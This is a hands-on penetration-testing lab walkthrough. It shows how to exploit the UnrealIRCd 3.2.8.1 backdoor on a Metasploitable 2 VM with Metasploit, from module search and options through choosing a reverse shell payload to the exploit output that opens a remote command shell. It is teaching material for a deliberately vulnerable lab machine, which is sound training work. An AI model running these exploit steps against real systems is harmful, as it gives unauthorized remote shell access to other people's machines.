Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.
Requirements
Kali Linux
The Kali Linux VM (or any other type of installation)
Metaploitable 2
The Metasploitable 2 VM
Metasploitable Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Kali Linux IP
The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.
Laboratory Workflow
The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.
1. Launch the Metasploit Framework
msfconsole
2. Search for the appropriate module
search unreal_irc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
3. Use the module
use exploit/unix/irc/unreal_ircd_3281_backdoor
4. Check the module options
options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
5. Set the appropriate options
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.142
6. Show possible payloads
show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
10 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
7. Select the payload
set PAYLOAD payload/cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
8. Show options for payload
show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.8.142 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
9. Fill the options for the payload
set LHOST 192.168.8.147
LHOST => 192.168.8.147
10. Run the exploit
exploit
[*] Started reverse TCP double handler on 192.168.8.147:4444
[*] 192.168.8.142:6667 - Connected to 192.168.8.142:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.8.142:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 2deEA9aiYAIk24Xy;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "2deEA9aiYAIk24Xy\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.8.147:4444 -> 192.168.8.142:36910) at 2023-03-28 07:36:16 -0400
Video
Video that resumes everything on this laboratory.
Questions
Now that you have completed this exploitation try to answer to following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?